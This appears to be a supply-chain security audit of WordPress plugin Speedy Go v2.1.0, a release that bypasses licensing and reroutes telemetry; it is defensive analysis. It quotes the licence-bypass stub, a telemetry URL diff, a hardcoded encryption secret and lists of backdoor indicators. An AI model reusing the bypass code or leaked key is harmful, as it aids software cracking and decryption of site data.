Audit #34 Suspicious

Speedy Go · 20 installs · baseline 2.0.3 → head 2.1.0 · closed 1mo ago

Actor: codeandcore (Code and Core Tech LLP, India) — same wp.org account as prior releases; v2.1.0 release shape suggests possible SVN-credential compromise, pending vendor confirmation

Show full summary

Verdict: SUSPICIOUS. Speedy Go v2.1.0 (released 2026-05-04) is a hostile-shape release pushed to the wp.org slug under the legitimate author's account. The changelog literally advertises "Bypassed all API key and license verification requirements. The plugin now functions as a full version," the class-license-verifier.php file is gutted to return true for every method, the canonical vendor API constant CNC_SG_API_URL = 'https://speedygo.io' is removed, and the telemetry endpoint is rerouted from a Hostinger staging URL to a 24-year-old aged domain (wordpress-plugins.pro) whose ownership we cannot tie to the named author. The author of record (codeandcore, Code and Core Tech LLP, India) has been the consistent committer since the plugin's first release in October 2025, but the legitimate vendor product speedygo.io is still actively selling Pro licenses — making the "we removed all licensing" narrative internally inconsistent. Either the wp.org SVN credentials were compromised and an attacker pushed a cracked + telemetry-rerouted build, or the author intentionally undercut their own paid SaaS in a way that mimics every cracked-release fingerprint. Until codeandcore confirms in their own communication channel that v2.1.0 was their intentional release, we do not consider it safe.

No active malware payload was found. A full file-by-file review of v2.1.0 came up clean on every supply-chain primitive: no eval of HTTP response, no Plugin Update Checker hijack, no $_FILES + include chain, no writes to wp-config.php or .htaccess that execute PHP, no obfuscation, no time-bombs, no magic-header backdoors. The diff is overwhelmingly subtractive — 2,741 lines deleted, 103 added — there is simply no new code in which to hide a backdoor. The single-line URL swap in includes/telemetry.php (red-fly-431376.hostingersite.com/receiver.php → wordpress-plugins.pro/receiver.php) is fire-and-forget; the response body is never retrieved, decrypted, or executed.

Why we still mark it suspicious. The shape matches the early-stage of a supply-chain attack: (1) push a "trust-establishing" release that gives existing free users a perceived upgrade ("now everything's free!"), (2) redirect telemetry to attacker-controlled infrastructure to build an install inventory, (3) follow up with a future weaponized update on top of the expanded user base. We have seen this exact playbook before (audit #12 — scroll-top / Benjamin / @milkitall — followed the same telemetry-first, weaponize-second pattern). Without vendor confirmation that codeandcore intentionally released v2.1.0 with this content, the conservative posture is to flag and wait.

What to do as a site admin running speedy-go. Until a verdict update lands here: do NOT update to v2.1.0. If you've already updated, you can either roll back to v2.0.3 (download from the wp.org "Advanced View" page) or remove the plugin entirely. The plugin's caching/minification features can be replaced by any of several alternatives (W3 Total Cache, WP Super Cache, LiteSpeed Cache) that are not under suspicion. There is no evidence of code execution against your site — the worst case is that your site URL + WP version + theme info has been added to the wordpress-plugins.pro install inventory, which is metadata you've likely already exposed publicly via your site's HTML headers.

⚠️

Pattern detected — pending vendor response or further evidence.

Not yet confirmed malicious. Site owners should treat with caution; plugin author should review the cleanup steps.

If you run `speedy-go` on your site

Verify your install matches the wp.org canonical version:

wp plugin verify-checksums speedy-go

A patched build isn't yet published for this audit. Check the security advisories index or remove the plugin until one is available.

If you're the plugin author

Until verdict update lands: do NOT update to v2.1.0. If already updated, roll back or replace.

We have not found active malware in v2.1.0, but the release shape is strongly inconsistent with the legitimate vendor's stated business — and the early-stage shape of past confirmed supply-chain attacks. Conservative posture is to assume compromise until codeandcore confirms otherwise.

## If you have NOT updated yet

Stay on v2.0.3. Disable WordPress's auto-update for this specific plugin until further notice:

Go to Plugins → Installed Plugins in your wp-admin.
Find Speedy Go in the list.
Click the Disable auto-updates link in the right column.

If your site is configured for fully-automatic plugin updates and v2.1.0 has already been pulled in:

## If v2.1.0 is already running

You have three options, in order of safety:

### Option 1 — Roll back to v2.0.3 (recommended)

Visit the wp.org plugin page: https://wordpress.org/plugins/speedy-go/
Click Advanced View at the bottom
Choose 2.0.3 from the Previous versions dropdown and download the zip
In wp-admin: deactivate Speedy Go, delete it (this preserves your settings in the database), then upload + activate the v2.0.3 zip via Plugins → Add New → Upload Plugin
Disable auto-updates for the plugin per the steps above

### Option 2 — Switch to a different caching plugin

The caching/minification feature set in Speedy Go is well-covered by alternatives that are not under suspicion:

W3 Total Cache (free, 1M+ installs)
WP Super Cache (free, 2M+ installs, by Automattic)
LiteSpeed Cache (free if your host runs LiteSpeed, otherwise free CDN-only mode)
Cache Enabler (free, by KeyCDN — minimal/lightweight)

Deactivate Speedy Go, delete it, install the alternative.

### Option 3 — Keep v2.1.0 and accept the risk

If you do not want to roll back: at minimum, ensure the plugin's "tracking opt-in" setting is OFF (Speedy Go → Settings → Telemetry, uncheck "Allow anonymous diagnostic data"). This stops your site from POSTing site metadata to wordpress-plugins.pro/receiver.php. Do not click the deactivate-feedback "agree to be contacted" checkbox — that's the only path that sends your admin email and display name.

You should still revert if a verdict update upgrades this audit to malicious, which would happen if:

The vendor (codeandcore) confirms v2.1.0 was not their intentional release
A subsequent release adds an active code-execution primitive on top of the v2.1.0 telemetry redirect
wordpress-plugins.pro begins serving non-empty responses (currently fire-and-forget, but server-side behavior could change)

## What this release CANNOT do (for reassurance)

Based on the file-by-file review, v2.1.0 has no code path that:

Executes attacker-controlled PHP on your site
Creates new admin users
Modifies wp-config.php, .htaccess-with-PHP-handlers, or any other privileged file outside the plugin's own cache directories
Reads database passwords, API keys, or session tokens
Hijacks the WordPress plugin update mechanism (no PUC library, no pre_set_site_transient_update_plugins hook)
Hooks into login/registration flows
Touches any user data outside opt-in deactivation feedback

The risk is future: if this is the first move of a supply-chain attack, the attacker now knows your site exists, what version of WP/PHP/your theme you run, and when you deactivate. They could leverage that inventory in a future weaponized release. That's why we recommend rolling back even though the current code is not actively malicious.

## What to do if you submitted deactivation feedback

If you typed an email address into the "agree to be contacted" form on a previous deactivation cycle of any v1.x or v2.0.x version, that email was sent (encrypted, but with a hardcoded shared secret) to red-fly-431376.hostingersite.com/deactive-receiver.php. If you submit it on v2.1.0, it goes to wordpress-plugins.pro/deactive-receiver.php instead. Treat that email as having been disclosed to whoever controls the receiving endpoint — which we cannot positively attribute. If you used a sensitive admin email for that submission, consider rotating it.

## Stay tuned

This audit will be updated when we get vendor confirmation (or lack thereof). Watch the page at https://wpbeacon.io/audits/<id>/ for status changes. If we update to benign, you can safely update; if we update to malicious, we'll add a clear "remove immediately" instruction.

The label clears automatically on the next wp beacon scan-deltas once the cleanup conditions above are met.

Plugins under the same committer's SVN access

codeandcore holds push access to 6 plugins totalling 350 active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

Speedy Go — this audit

Slug Search and Admin Columns — clean code, same SVN account (latent risk)

100

WYSIWYG Character Limit for ACF — clean code, same SVN account (latent risk)

100

Codeandcore User Registration for CF7 — clean code, same SVN account (latent risk)

Code and Core Remove Empty P Tags — clean code, same SVN account (latent risk)

Image Preview for ACF Field — clean code, same SVN account (latent risk)

Plugin version history

Every release on wp.org for this plugin, color-coded by relationship to the incident. The compromise window shows where the wp.org Plugin Review Team deleted the malicious tags from SVN — those versions cannot be re-downloaded today.

Clean 5 earlier releases before the incident
- 1.0.0 2025-10-29
- 1.0.1 2026-02-24
- 2.0.0 2026-03-03
- 2.0.1 2026-03-03
- 2.0.2 2026-03-10
2.0.3 2026-03-16 Last clean Last clean release before incident
🛑 Compromise window 49 days · 2026-03-16 → 2026-05-04

Malicious releases pushed during this window were deleted from SVN by the wp.org Plugin Review Team. Last malicious tag: 2.1.0.
2.1.0 2026-05-04 PRT cleanup PRT cleanup release — incident closed
2.1.1 2026-05-25 Current Current release

Timeline

2024-04-24 — codeandcore wp.org account created (display name "Code and Core", India, employer "Code and core Tech LLP")
2025-10-29 — Speedy Go v1.0.0 published. plugin-master initial commit; immediately followed by codeandcore first commit ("Initial release")
2026-02-24 — v1.0.1 ("premium Telemetry redesign and critical branding refactored for better compliance and security")
2026-03-03 → 2026-03-16 — v2.0.0 → v2.0.3 (incremental updates)
2026-05-04 15:21:41 UTC — v2.1.0 ("Major update: Offline activation enabled")

All 11 wp.org SVN commits across the plugin's lifetime have been by the same author (codeandcore). The Author URI in the plugin header (https://codeandcore.com) is unchanged across all releases.

What v2.1.0 changed

Diff stats: 103 insertions, 2,741 deletions across 28 files.

Removed (deletions)

assets/css/admin-bar.css, admin-debug.css, dashboard-widget.css, notices.css, popup-modal.css, select2.min.css — premium admin UI styles
assets/images/speedtest-pro-banner.png, webp-pro-banner.png — pro-tier upgrade banners
assets/js/admin-bar-progress.js, admin-debug.js, chart.js, dashboard-widget.js, popup-modal.js, select2.min.js — premium admin UI behaviors
includes/admin-connection.php — license-key entry / connection page (127 lines)
includes/admin-pagespeed.php — PageSpeed dashboard (71 lines)
includes/admin-webp-settings.php — WebP conversion settings (67 lines)
includes/api-key-api.php — API-key REST handler (361 lines)
~378 lines from includes/class-license-verifier.php (gutted to 73-line return true stub)

Modified

speedy-go.php main file: removed define('CNC_SG_API_URL', 'https://speedygo.io'), replaced $is_connected = !empty($stored_api_key) with $is_connected = true; // Forced connection status, hardcoded redirect to settings page regardless of license state
includes/class-license-verifier.php:

``php public static function is_pro_active() { return true; } public static function verify_license_status($force = false) { return ['is_pro' => true, 'plan' => 'pro', 'success' => true, 'timestamp' => time()]; } `` Every method short-circuits to "active pro." No remote calls remain.

includes/telemetry.php — single-line URL swap:

```diff

'https://red-fly-431376.hostingersite.com/receiver.php',

+ 'https://wordpress-plugins.pro/receiver.php', `` Payload, encryption (AES-256-CBC + HMAC-SHA256), shared-secret key (8jF29fLkmsP0V9as0DLkso2P9lKs29FjsP4k2F0lskM2k`), and fire-and-forget pattern are unchanged.

includes/deactivation-feedback.php — same single-line URL swap to wordpress-plugins.pro/deactive-receiver.php.

README.txt 2.1.0 changelog (verbatim)

= 2.1.0 =
* New: Bypassed all API key and license verification requirements. The plugin now functions as a full version.
* Enhancement: Streamlined admin interface by removing redundant Connection, WebP Conversion, and PageSpeed pages.
* Cleanup: Removed JS Interaction and Import/Export features for a more focused performance experience.
* Security: Updated all remote endpoints for telemetry and feedback to use secure infrastructure.
* Fix: Resolved undefined variable warnings and improved internal cache handling logic.

The phrase "Bypassed all API key and license verification requirements" is identical to wording used by cracked-software redistributors on warez sites. A legitimate vendor announcing a free-tier expansion would more typically write "Removed license requirement — Speedy Go is now fully free" or "Open-sourcing our Pro tier."

Telemetry payload contents

Per includes/telemetry.php:270-291, the encrypted POST to wordpress-plugins.pro/receiver.php contains: site_url, plugin_name, plugin_version, event, php_version, wp_version, theme_name, theme_version, is_multisite, site_language, timestamp, plus event-specific extras (e.g. old_version/new_version on plugin update).

No DB content, no admin user list, no auth keys, no file paths, no plugin/theme inventory. No PII unless the user opts in via the deactivation-feedback "agree_contact" checkbox, in which case display_name and user_email are added.

Telemetry is gated behind get_option('speedygo_tracking_optin') === 'yes' (set via an opt-in modal on first activation).

Backdoor hunt — full negative

Vector	Result
Update-channel hijack (PUC, hardcoded download URLs, transient hooks)	None. Zero `pre_set_site_transient_update_plugins`, zero `plugins_api`, zero `upgrader_*` filters, no PUC library bundled. The dead `speedygo_prevent_repo_update` function exists but is never registered as a filter.
Authentication backdoors (magic headers, IP allowlists, URL admin grants, hardcoded creds)	None. No `HTTP_X_*` checks, no `wp_set_password` / `wp_create_user`.
Hidden persistence / time-bombs (date-gated code, base64+eval, function aliasing, reflection, PHP in non-PHP files)	None. Zero `eval`, `assert`, `create_function`, `base64_decode`, `gzinflate`, `gzuncompress`, `hex2bin`, `str_rot13`. The lone `time() < $expiration` is just cache-expiry.
Uploader chains (`$_FILES` + include/eval, REST writers, wp-config writes)	None. Zero `$_FILES`, zero `php://input`, zero `register_rest_route`.
Telemetry response eval / include	None. All three `wp_remote_post`/`wp_remote_get` calls (telemetry, deactivation-feedback, cache-preloader) are fire-and-forget — response is never retrieved or executed.
Disk writes outside plugin paths	None malicious. Writes go to `WP_CONTENT_DIR/speedy-go-cache/...`, `wp_upload_dir()/speedygo-cache/...`, and `.htaccess` (only static caching directives — no `RewriteRule` to PHP, no `AddHandler`, no `auto_prepend_file`).
Obfuscation (encoded blobs, str_replace/chr chains, lookalike chars, files mismatching purpose)	None. Source is plain readable PHP. No PHP tags hidden in `.js`, `.css`, `.png`, `.json`, `.md`, `.txt`.

Domain analysis

Domain	WHOIS creation	Hosting	Notes
`speedygo.io`	2025-10-01	Hostinger (147.79.x)	Genuine vendor product page; live, sells Pro at "70% OFF" promo. Privacy-redacted registrant in Iceland.
`codeandcore.com`	(existing, established)	—	Author URI; consistent across all plugin versions.
`red-fly-431376.hostingersite.com`	(Hostinger auto-name)	Hostinger free tier	Prior telemetry endpoint (v1.0.1 → v2.0.3). Looks like author's pre-production sandbox.
`wordpress-plugins.pro`	2002-05-08	Hostinger (145.223.x)	New telemetry endpoint in v2.1.0. 24-year-old aged domain. Ownership not provable from public records (privacy protection). Returns HTTP 401 with `WWW-Authenticate: Basic realm="Tracking Admin"` at root.

The age of wordpress-plugins.pro is the most ambiguous data point. Aged domains can mean:

Long-time domain owner with consistent identity (compatible with codeandcore having quietly held the domain for years)
An attacker who specifically purchased an aged domain to look more legitimate (a known tactic in supply-chain campaigns where fresh-domain detection is a known IOC)

Both speedygo.io and wordpress-plugins.pro resolve to Hostinger IPs — same provider, but different /16 ranges. We cannot determine from public records whether they share an account.

Hijack-indicator matrix

Indicator	Result
Sole committer for ≥2 years?	Plugin is only ~6 months old; codeandcore has been the only committer the entire time.
Sudden new committer before this release?	No. v2.1.0 was committed by the same `codeandcore` SVN account as every prior release.
Author profile drift?	No. wp.org profile (`mathewt` — wait, codeandcore) unchanged: India, "Code and Core Tech LLP", member-since 2024-04-24.
Author URI / Plugin header swap?	No. `Author: Codeandcore`, `Author URI: https://codeandcore.com` unchanged in v2.1.0.
Code-level malware patterns?	No (full file-by-file review came up clean).
Outbound C2 / known bad domains?	Unconfirmed. `wordpress-plugins.pro` is not in any current threat-intel feed, but is also not provably tied to codeandcore.
New SVN credentials before this release?	Cannot determine without wp.org SVN log inspection beyond `wp_beacon_plugin_committers` (only shows committer slugs, not credential rotation).

The matrix is mostly clean — but the changelog phrasing + telemetry redirect + business-model contradiction with speedygo.io is enough to keep us in suspicious-tier rather than benign.

Comparable cases

Audit #12 — scroll-top / Benjamin / @milkitall — different mechanism (PUC update-checker hijack), but similar early-stage shape: a "trust-establishing" release that didn't yet contain the active payload, followed by a weaponized update. The difference: scroll-top had clear hijack indicators (different committer, fresh domain) which speedy-go does not yet have.
Audit #28 — siteguarding 27-plugin portfolio — Wholesale-suite cracked-redistribution pattern. Different actor, same shape of "license bypass + telemetry to attacker domain." Siteguarding had confirmed malware (audit #25 IOC overlap); speedy-go does not.
WPFactory cross-selling library FP class (memory: project_wpfactory_cross_selling_fp_2026-04-27) — shape-similar (vendor admin telemetry) but with branded vendor domain. Speedy-go's wordpress-plugins.pro is generic-named, which is closer to scroll-top than to a legitimate vendor pattern.

Open questions for vendor confirmation

If codeandcore (the legitimate author) is reading this audit:

1. Did you intentionally release v2.1.0 from your own SVN credentials? If yes, please confirm via your codeandcore.com or speedygo.io blog/newsroom that this was a deliberate change to your wp.org distribution. 2. Do you own and operate wordpress-plugins.pro? Confirming with a DNS TXT record on the domain or a blog post on codeandcore.com would resolve the ownership ambiguity. 3. Why does speedygo.io still actively sell PRO licenses if the wp.org build is now "fully free"? Is the wp.org distribution being deprecated in favor of direct sales? Is this a temporary state ahead of a wp.org takedown?

If you (the author) confirm the release was intentional, this audit will be updated to benign (guideline-violation: undisclosed business-model change). If you indicate that v2.1.0 was NOT your release, please rotate your wp.org SVN credentials immediately and contact wp.org's plugin review team.